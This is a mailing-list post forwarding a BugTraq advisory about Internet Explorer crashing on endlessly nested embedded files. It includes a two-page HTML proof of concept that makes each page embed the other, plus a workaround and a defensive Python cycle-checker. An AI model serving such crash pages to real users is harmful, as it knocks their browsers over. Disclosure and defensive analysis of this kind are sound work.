No subject


Wed Nov 1 13:33:48 EST 2006


Microsoft Internet Explorer - Crash on processing embedded files with
endless loop (05/28/2005)

Description:
There is a bug in Microsoft Internet Explorer, which causes a crash in it.
The bug occurs, because Microsoft Internet Explorer doesn't limit the depth
of embedded files.

Affected software:
Microsoft Internet Explorer

Workaround:
Deactivate "ActiveX" in the IE options menu.

Proof-of-Concept exploit:

Page #1 (save as "btf1.htm"):

<html><head><title>BTF - MSIE crash</title></head><body>
<object data="./btf2.htm" width="0" height="0"></object>
</body></html>

Page #2 (save as "btf2.htm"):

<html><head><title>BTF - MSIE crash</title></head><body>
<object data="./btf1.htm" width="0" height="0"></object>
</body></html>

Date of discovery:
26. September 2003

Tested software:
Microsoft Internet Explorer 6 SP2 (6.0.2900.2180.xpsp_sp2_gdr.050301-1519)
on a fully patched Windows XP SP2 system.

DLL versions:
MSHTML.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
BROWSEUI.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
SHDOCVW.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
SHLWAPI.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
URLMON.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
WININET.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)

Regards,
Benjamin Tobias Franz
Germany


Eoin Keary
Contractor
Allianz Ireland
IT Security (Tech Admin)
Security Projects Division
Dir: + 353-1-613-3490
Mob: + 353-87-904-1922
Mailto:eoin.keary at allianz.ie
Ph  01 6133490
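
An added example, not part of the original advisory or message: a Python sketch of the check the description says is missing, following `<object data=...>` references with cycle detection and a depth limit. The `example.test` URLs, the `MAX_EMBED_DEPTH` value of 8 and all function names are assumptions made for this illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin

MAX_EMBED_DEPTH = 8  # assumed policy value, not taken from the advisory

class ObjectRefs(HTMLParser):
    """Collect the data= targets of <object> elements in one document."""
    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        data = dict(attrs).get("data")
        if tag == "object" and data:
            self.refs.append(data)

def check_embedding(url, fetch, chain=(), max_depth=MAX_EMBED_DEPTH):
    """Return findings for the embed tree rooted at url; fetch(url) gives HTML or None."""
    if url in chain:  # the document embeds one of its own ancestors
        return [("cycle", chain[chain.index(url):] + (url,))]
    if len(chain) >= max_depth:  # acyclic, but deeper than the policy allows
        return [("too-deep", chain + (url,))]
    html = fetch(url)
    if html is None:
        return []
    parser = ObjectRefs()
    parser.feed(html)
    findings = []
    for ref in parser.refs:
        child = urljoin(url, ref)  # resolve "./btf2.htm" against the parent
        findings += check_embedding(child, fetch, chain + (url,), max_depth)
    return findings

# Constructed sample input: the advisory's two pages plus a 20-page chain.
BASE = "http://example.test/"
PAGES = {
    BASE + "btf1.htm": '<html><body><object data="./btf2.htm" width="0" height="0"></object></body></html>',
    BASE + "btf2.htm": '<html><body><object data="./btf1.htm" width="0" height="0"></object></body></html>',
    BASE + "plain.htm": "<html><body><p>no embeds</p></body></html>",
}
PAGES.update({f"{BASE}n{i}.htm": f'<object data="n{i + 1}.htm"></object>' for i in range(20)})

if __name__ == "__main__":
    for start in ("btf1.htm", "n0.htm", "plain.htm"):
        print(start, check_embedding(BASE + start, PAGES.get))
```

The ancestor chain catches the mutual embed on the second hop, and the depth limit bounds chains that never repeat a URL.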











From BugTraq,
A nice little IE vuln:




More information about the Owasp-ireland mailing list